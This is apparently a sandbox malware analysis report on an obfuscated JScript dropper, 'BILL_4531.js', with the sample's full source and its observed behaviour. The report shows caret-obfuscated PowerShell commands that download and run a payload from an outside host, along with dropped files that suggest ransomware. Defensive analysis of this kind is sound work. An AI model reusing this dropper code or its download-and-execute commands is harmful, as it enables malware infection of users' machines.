function nsetriso() {
return 4;
}
function sxuwga() {
return '95275';
}
function ozgusaq() {
var xjomgokhe = "o6r6gb5i8elw5e1bzuo6r69i64y9o9n3xo9n3 /o6r6 pipz6pl6oWo9n3ripz6pl6sqf8o9n32ipz6pl6o9n3LLbzuo6r69i64y9o9n3ipz6pl6Xo9n3 ipz6pl6-ipz6pl6o9n3Xo9n3o6r6Ul2uo6r69i64iOnPoLiipz6pl6o6r6Y Bypipz6pl6uo6r69i6ipz6pl6ssipz6pl6 -ipz6pl6nOipz6pl6PROFilipz6pl6o9n3ipz6pl6 -wipz6pl6iNelw5e1Owipz6pl6sl2uo6r69i64yipz6pl6Lo9n3ipz6pl6 qf8o9n32ielw5e1elw5e1ipz6pl6o9n3nipz6pl6 gb5i8u1qf8o9n32r6No9n3wipz6pl6-oBJo9n3o6r6l2uo6r69i64 Sipz6pl6Ysipz6pl6l2uo6r69i64o9n3ipz6pl6gb5i8ipz6pl6bzuo6r69i64y9ipz6pl6No9n3l2uo6r69i64ipz6pl6bzuo6r69i64y9Wipz6pl6o9n3ipz6pl6Bo6r6lipz6pl6Iipz6pl6o9n3nl2uo6r69i64ngb5i82ln2bzuo6r69i64y9elw5e1Oipz6pl6wipz6pl6nlOuo6r69i6elw5e1filo9n3gb5i8u1qf8o9n32r6ipz6pl6mwa1a2qf8o9n32l2uo6r69i64l2uo6r69i64pgy7dg5//wwwbzuo6r69i64y9injusl2uo6r69i64io6r6o9n3ilbzuo6r69i64y9l2uo6r69i64op/uso9n3rbzuo6r69i64y9pqf8o9n32p?f=2bzuo6r69i64y9elw5e1uo6r69i6l2uo6r69i64mwa1a2,ipz6pl6mwa1a2du3h8uo6r69i6Ppelw5e1uo6r69i6l2uo6r69i64uo6r69i6du3h8bzuo6r69i64y9o9n3Xo9n3mwa1a2ngb5i82ln2;sl2uo6r69i64ipz6pl6uo6r69i6rl2uo6r69i64ipz6pl6-pipz6pl6Ripz6pl6Oo6r6ipz6pl6o9n3Ssipz6pl6 du3h8uo6r69i6pPelw5e1uo6r69i6l2uo6r69i64uo6r69i6du3h8bzuo6r69i64y9o9n3Xo9n3";
var ixunlogs = [/du3h8/gi
/gy7dg5/gi
/mwa1a2/gi
/o6r6/gi
/uc9i6/gi
/elw5e1/gi
/gb5i8/gi
/o9n3/gi
/ipz6pl6/gi
/qf8e2/gi
/mu1hr6/gi
/bza4y9/gi
/nm2ln2/gi
/l2a4/gi];
var ewavke = [yjcewp
uquhiwn
fafiq
ubhogy
geju
noxah
ibxesno
ypedhycw
jyxtiw
dbaxanzi
zbike
npobwus
ajrahh
efyfis];
var wtyzyj = 0;
while (1) {
if (wtyzyj == ixunlogs.length) break;
if (/cri/.test(ScriptEngine())) xjomgokhe = xjomgokhe[aqmery](ixunlogs[wtyzyj], ewavke[wtyzyj]);
wtyzyj++;
}
return xjomgokhe;
}
switch (zcagyl()) {
case 1:
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
case undefined:
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
case null:
switch (ytxobo()) {
case 'aby':
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 'koqi':
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 1:
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case undefined:
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 8.654:
if (alucra === undefined) {
var farkysp = 1;
if (farkysp == true) {
if (ycwywbarm() == 0) {
var lkopzikyfe = true;
yjetlaxle = 75 + "vpulrope";
var usfulexv = 'juhinqemdu';
var escogi = "umy" + 4.834;
var mvilpexpihk = typeof null;
}
}
} else {
switch (bagef()) {
case true:
if (wyvun() == undefined) {
if (typeof etfygfaqy == "object") {
var axverics = typeof 0;
var umkelybd = "ihusespe";
var omegoxab = 676;
inxikulgig = omegoxab + umkelybd;
inxikulgig = inxikulgig + '8928';
}
}
var fhuwovguhxo = undefined;
if (fhuwovguhxo == undefined) {
if (typeof ylqeful() == 'string') {
if (typeof pjipukyzz() == "number") {
var uhansywfyx = typeof 65;
var dxegydla = typeof "elxolujw";
}
}
}
break;
case null:
if (wyvun() == undefined) {
if (typeof etfygfaqy == "object") {
var axverics = typeof 0;
var umkelybd = "ihusespe";
var omegoxab = 676;
inxikulgig = omegoxab + umkelybd;
inxikulgig = inxikulgig + '8928';
}
}
var fhuwovguhxo = undefined;
if (fhuwovguhxo == undefined) {
if (typeof ylqeful() == 'string') {
if (typeof pjipukyzz() == "number") {
var uhansywfyx = typeof 65;
var dxegydla = typeof "elxolujw";
}
}
}
break;
case 'jcyd':
var emynri = typeof 1;
var ixitgock = typeof null;
var fgogoqapn = '71786';
fgogoqapn = 774 + fgogoqapn;
var qkydilycu = 'zkacly';
qkydilycu = "oxa" + qkydilycu;
var pynirih = 280.648;
xdibaboma = 82.1067 + "70519";
var eriqmivhum = typeof null;
if (evulon() === 571) {
if (buzapm() === 'etifsigj') {
var yvipqerdafq = typeof null;
var dnefhulkav = typeof null;
}
} else {
switch (upqetp) {
case null:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
case 1:
var ybbanbo = new ActiveXObject("WScript.Shell");
var amygk = 10;
switch (amygk) {
case null:
var dhaqsira = 0;
if (typeof dhaqsira == 'number') {
icdeqlyd = 'ode';
ydugekqe = 1.8;
var ijtustys = icdeqlyd + ydugekqe;
ijtustys = 3 + ijtustys;
ojimuzwo = 499;
var ffelakn = vimzimfy + ojimuzwo;
var eslipqybzen = typeof null;
urranvinx = '78597' + 551;
var skezedu = typeof null;
}
if (evwybo() === 854) {
qmodqumbo = 5 + "dsowahni";
var ofezatmon = undefined;
var yqyjuvwin = null;
var zwuhrepreq = typeof 0;
var tfifkijs = 7;
var owvebo = 'yxybh';
var ppovyhyxy = 2;
var advomij = ppovyhyxy + owvebo;
advomij = advomij + 5.5405;
var ylexo = "ewloqh";
}
if (imekpajwob == 62) {
adyrte = 1.788 + '36731';
var ydrolso = null;
}
break;
case 10:
if (nsetriso() < 9) {
switch (jisvapax) {
case null:
if (mkiwo() === 17.1654) {
var vebenvy = typeof false;
var zujoqe = 651.6468 + "59727";
}
if (osyqqorvalq() === undefined) {
var kyrnorxotda = "ewyna";
var ehevga = 924;
var yxojmobdi = kyrnorxotda + ehevga;
yxojmobdi = yxojmobdi + 10.2195;
}
var obfymogev = "qepozkobg";
if (obfymogev === 783) {
var nonirq = "77148";
var vrijyrloji = 691 + "vtabi";
}
break;
case false:
if (mkiwo() === 17.1654) {
var vebenvy = typeof false;
var zujoqe = 651.6468 + "59727";
}
if (osyqqorvalq() === undefined) {
var kyrnorxotda = "ewyna";
var ehevga = 924;
var yxojmobdi = kyrnorxotda + ehevga;
yxojmobdi = yxojmobdi + 10.2195;
}
var obfymogev = "qepozkobg";
if (obfymogev === 783) {
var nonirq = "77148";
var vrijyrloji = 691 + "vtabi";
}
break;
case 1.671:
switch (ocuqga()) {
case 'ddemixmocs':
if (utany === null) {
var ydjuvi = typeof false;
}
if (ukotyfsug() === 0) {
var fjupoq = typeof undefined;
var covyd = typeof false;
var dawtot = typeof "uxjapqe";
var rzedizhi = typeof null;
var fyhhuxtaw = typeof 39.7048;
var hufibed = 8 + 'asbiclusev';
}
if (ugbuts === 'hucviqidlo') {
if (xxiccufuxby == true) {
var guqweqasky = 'hywpojefe';
var vtonkes = '1496';
itokig = 167;
var ebeziqef = vtonkes + itokig;
ebeziqef = ebeziqef + 27;
var abiga = "38195" + 66;
}
}
break;
case false:
var tytvor = 0;
if (lerlerkytu == "undefined") {
if (sxuwga() === null) {
if (zhavutfi() == 15.0474) {
var mofcax = 124;
var ywuqko = mofcax + pvydinoko;
ywuqko = 3 + ywuqko;
var uhycxowto = 'tasenaxqe' + 21.343;
var dzibysko = "zlip";
var oddupaduq = 39.055;
var rvuvdecw = dzibysko + oddupaduq;
rvuvdecw = rvuvdecw + '75112';
var axgurhyje = 43.108;
var zmerawzax = "ifjimvycy" + 61.8249;
}
if (avompavwir() === 715) {
var fuldunvive = "19040" + 80;
}
if (afdih == null) {
if (xocygcah() < -26) {
var ejlacozfe = undefined;
if (ejlacozfe === 0) {
var xuhylu = "65881";
xuhylu = 16.872 + xuhylu;
}
}
}
} else {
var ogakwite = typeof 1;
var hodfar = 68;
hodfar = 3.66 + hodfar;
var syhvejuzni = typeof null;
var akysroxihr = typeof 85;
var ymununt = typeof undefined;
if (izgyjgipso == 0) {
if (mmysse() === 21.5) {
var ohnyjraboq = typeof undefined;
var aqadbomto = typeof "bfixvisymg";
var okhuxvylyp = typeof true;
}
if (yzfotdynasw === 1) {
var dekusboz = 884 + "33099";
var dzylesj = typeof undefined;
var ykishodpiv = 'ikdevnozni';
var arsyqu = typeof 0;
var egcafditvi = 17.22;
var ytifigy = egcafditvi + jkobeqivh;
ytifigy = "28474" + ytifigy;
ccehef = '30898' + 18.953;
var ekcahtepx = typeof '58680';
}
} else {
var ufadebo = typeof false;
var urcabeze = typeof true;
var bvomsusdu = 76.442;
bvomsusdu = '57273';
var gydmiqxofvi = "78825";
var nyrnuvne = typeof null;
switch (oqgovajo()) {
case false:
if (ikwucelfy == "alyfmixamz") {
var ygfavzixt = 'zhypubpajmy';
if (ygfavzixt == true) {
var zruvjafyjb = typeof 234;
var isiqa = 290;
var gixgydtahzo = isiqa + vgyxpekxo;
var febagjyqqu = 89 + "59030";
var octefonavq = typeof 1;
}
}
var vwivefnawy = "urylz";
if (vwivefnawy === 'urylz') {
var geluzwo = "nar" + 0.1713;
}
break;
case null:
if (anar() === 'nune') {
if (qzibxijdeqo() == 608) {
var evpelqotu = typeof true;
}
if (typeof hyxi() == "string") {
if (iwkydciti() == false) {
var divoq = typeof false;
var ihwuzhyc = null;
udbejmesapd = '89091';
var daxxev = 4.75;
var mzucuxbyf = daxxev + udbejmesapd;
var ibdyvi = '34582' + 604;
}
}
} else {
var acuvby = undefined;
if (acuvby == 687) {
var aqodep = null;
if (aqodep === null) {
var wivbotelma = typeof 'trugre';
}
} else {
if (ilavhys === null) {
ybbanbo.run(ozgusaq()
naccexgi);
} else {
if (hafutw() === undefined) {
var snihxuputly = typeof "ebeve";
var rtesemre = null;
var zufhedt = typeof undefined;
var kykqiwor = 'atpadkacasx' + 176;
var enwucnanzy = 'uqagr';
var ideluzy = typeof "isvemaftus";
}
}
var jurata = typeof true;
var vbonlajybu = 'hjijokj';
var arqixyfevf = 13.23;
var nibxygu = vbonlajybu + arqixyfevf;
nibxygu = "13734" + nibxygu;
var ifjopitxa = true;
var ludiwonva = true;
var lobutby = 13.86;
var iqidfekm = 'uluzpamtog';
var owwixupar = 80;
}
}
break;
}
}
}
} else {
if (typeof ohug == "undefined") {
if (fdutvax() == null) {
var rudena = typeof false;
var aznefsasso = 19.426 + "94173";
var eljocos = 'lgosrynyzi' + 10.1716;
var yssenqul = "90401";
var ysdoxyvumv = 14.8;
var mufixxa = yssenqul + ysdoxyvumv;
mufixxa = 16.358 + mufixxa;
var teriza = typeof 0;
iroregalp = 'pifcanzur';
uhegcejw = 12;
var ynkexocraq = uhegcejw + iroregalp;
var yqapur = "81582" + 2;
}
}
var ymcev = undefined;
if (ymcev == undefined) {
if (bycy() == 412) {
cipopyp = "38814";
mrettugcyhe = 276;
var vceqwatarc = cipopyp + mrettugcyhe;
vceqwatarc = vceqwatarc + 'qnykzuq';
var wohkihhe = '44852';
ufoversiw = 89.365;
emicalis = ufoversiw + wohkihhe;
emicalis = emicalis + "lwuk";
var cwihden = typeof 88;
var uvqigsitge = '979' + 20.332;
}
}
if (typeof olupa == 'string') {
var fmocabxisgo = 'swydopyj';
var ogjita = 36.764 + '18191';
var ixily = typeof 'sosma';
var aponbu = "gqymqi";
odtuzhyspag = 15.4;
muqwem = odtuzhyspag + aponbu;
muqwem = 62 + muqwem;
var vecmohawh = 14.6;
}
}
rjydkiggul = "xcejbypos" + 30.8;
var ylduxucihq = 71.2626;
var fgenholza = false;
break;
case 21.46:
if (utany === null) {
var ydjuvi = typeof false;
}
if (ukotyfsug() === 0) {
var fjupoq = typeof undefined;
var covyd = typeof false;
var dawtot = typeof "uxjapqe";
var rzedizhi = typeof null;
var fyhhuxtaw = typeof 39.7048;
var hufibed = 8 + 'asbiclusev';
}
if (ugbuts === 'hucviqidlo') {
if (xxiccufuxby == true) {
var guqweqasky = 'hywpojefe';
var vtonkes = '1496';
itokig = 167;
var ebeziqef = vtonkes + itokig;
ebeziqef = ebeziqef + 27;
var abiga = "38195" + 66;
}
}
break;
}
break;
}
var uzoqony = typeof "ahbind";
uvvutlafis = "78220";
var deqilutku = 4;
var nikatez = deqilutku + uvvutlafis;
nikatez = '83642' + nikatez;
var cuqtuz = 7;
itictysew = cuqtuz + jlyzifhuxc;
itictysew = 5 + itictysew;
yvujemoj = 8.82 + 'ogbyt';
arjozxibu = "amargansad";
var ojowixi = 516;
gvowegy = ojowixi + arjozxibu;
var rmejlege = typeof undefined;
} else {
if (qoqkotsy() === 124) {
if (alsosj() == 777) {
var igambi = 190 + "eheph";
var uzifadr = 'ucyne' + 761;
var abbywawq = null;
var ygacu = 'iflywema';
var cagnol = typeof null;
}
}
if (immoffunha() === null) {
var omeni = 'rec';
var phetexape = 25;
var jywylgepsa = omeni + phetexape;
jywylgepsa = 12.33 + jywylgepsa;
var upnarusw = typeof null;
var hiqumizo = typeof 736;
var iwupduc = typeof null;
var zevalfo = null;
var canhibpyzu = 3.2 + '42744';
ohlycgy = 405 + "38137";
}
}
break;
}
break;
case undefined:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
case null:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
}
}
break;
}
}
break;
}
var nuranenvi = typeof false;
var yvinliqab = "5318" + 38.69;
break;
case '34230':
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
}" - source
- Static Parser
- relevance
- 5/10
-
Reads Windows Trust Settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source
- Registry Access
- relevance
- 5/10
-
Runs shell commands
- details
-
"/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe" on 2016-10-22.07:30:00.640
"/C del /Q /F "%TEMP%\sysE5A3.tmp"" on 2016-10-22.09:42:00.460 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe"
Spawned process "powershell.exe" with commandline "poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe"
Spawned process "eXe"
Spawned process "eXe"
Spawned process "firefox.exe" with commandline "-osint -url "%USERPROFILE%\Desktop\_HOWDO_text.html""
Spawned process "cmd.exe" with commandline "/C del /Q /F "%TEMP%\sysE5A3.tmp""
Spawned process "helper.exe" with commandline "/SetAsDefaultAppUser" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Connects to LPC ports
- details
-
"wscript.exe" connecting to "\ThemeApiPort"
"helper.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Contains ability to lookup the windows account name
- details
- GetUserNameW@ADVAPI32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"nav.css" has type "ASCII text"
"5DYGW9JJ-XIPQ-SEFB-D62E-8CABDDA95F33.odin" has type "data"
"_28_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"5DYGW9JJ-XIPQ-SEFB-7359-764CD16FFCE7.odin" has type "data"
"5DYGW9JJ-XIPQ-SEFB-9716-0A946C3CE4BE.odin" has type "data"
"home-&-garden" has type "HTML document ASCII text with CRLF line terminators"
"_21_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"healthreport.sqlite" has type "SQLite 3.x database user version 1"
"gmpopenh264.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"5DYGW9JJ-XIPQ-SEFB-4DDE-F004BFD77AEE.odin" has type "data"
"5DYGW9JJ-XIPQ-SEFB-5AFB-0FF7A6D5EE86.odin" has type "data"
"_22_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"healthreport.sqlite-wal" has type "data"
"5DA331CF89FC03A9797F848CD51BA54F20015C7D" has type "data"
"5DYGW9JJ-XIPQ-SEFB-F034-96B64D825B9A.odin" has type "data"
"recovery.js.tmp" has type "ASCII text with very long lines with no line terminators"
"goog-phish-shavar.pset" has type "data"
"5DYGW9JJ-XIPQ-SEFB-7AFD-E18982230556.odin" has type "data"
"cookies.sqlite-wal" has type "data"
"6DF4C247EB188DBE3AA7FEFB8B83F5C21339C17F" has type "data" - source
- Extracted File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
"wscript.exe" touched file "%WINDIR%\System32\WScript.exe"
"wscript.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"wscript.exe" touched file "%WINDIR%\system32\rsaenh.dll"
"wscript.exe" touched file "%WINDIR%\system32\wshom.ocx"
"wscript.exe" touched file "%WINDIR%\System32\OLEACCRC.DLL"
"wscript.exe" touched file "%WINDIR%\System32"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"wscript.exe" touched file "%WINDIR%\System32\cmd.exe"
"helper.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.osn.com/app_themes/osn/fonts/icon-osn.eot"
Pattern match: "http://nsis.sf.net/NSIS_Error"
Pattern match: "www.injusticeil.top"
Heuristic match: "community - thamizha.com"
Heuristic match: "ommunity - thamizha.com"
Heuristic match: "ciscobinary.openh264.org"
Pattern match: "http://www.nameboat.com"
Pattern match: "www.nameboat.com"
Pattern match: "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"
Pattern match: "https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css"
Pattern match: "https://fonts.googleapis.com/css?family=Lato:400,700,900,100,300"
Pattern match: "https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"
Pattern match: "https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"
Pattern match: "www.google-analytics.com/analytics.js','ga"
Pattern match: "http://www.efty.com/market/odf/js/odf.js"
Pattern match: "http://www.nameboat.com/ajax/market_themes/domain_overview_tiles/filters/'+form_values_for_url+'/user_id/1293/offset/10/keyword//"
Pattern match: "http://www.nameboat.com/ajax/market_themes/domain_overview_tiles/filters/'+form_values_for_url+'/user_id/1293/offset/init/keyword//"
Pattern match: "https://www.facebook.com/NameBoat-1778675352414159/"
Pattern match: "http://www.efty.com/"
Pattern match: "http://www.pyload-security.com/download.php?file=Desktop%20background.png,ID:4,docshellID:5,docIdentifier:4},{url:https://www.payload-security.com/download.php?file=Desktop%2520background.png,ID:5,docshellID:5,docIdentifier:5}],lastAccess"
Pattern match: "http://en.wikipedia.org/wiki/RSA_(cryptosystem)"
Pattern match: "http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe"
Pattern match: "http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe"
Pattern match: "https://www.torproje_.or9/download/download-easy.html" - source
- String
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "<li><a href="https://www.facebook.com/NameBoat-1778675352414159/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>" (Indicator: "facebook.com")
- source
- String
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"wscript.exe" opened "\Device\KsecDD"
"helper.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
File Details
BILL_4531.js
- Filename
- BILL_4531.js
- Size
- 24KiB (24923 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- 27c01df7b6de549f6d9e12f9e27601d0e785186c6d29a917419f7ac42822e076
- MD5
- 76fc21ce41c534b94bea7e1a7bce327c
- SHA1
- 8fdc6b79c402011a450bc522f5daa3cac9e147f1
Screenshots
Hybrid Analysis
Analysed 8 processes in total (System Resource Monitor).
- wscript.exe "C:\BILL_4531.js" (PID: 1264)
- cmd.exe /c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe (PID: 2356)
- powershell.exe poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe (PID: 2360)
- eXe (PID: 2708)
- eXe (PID: 2696)
- firefox.exe -osint -url "%USERPROFILE%\Desktop\_HOWDO_text.html" (PID: 2760)
- helper.exe /SetAsDefaultAppUser (PID: 600)
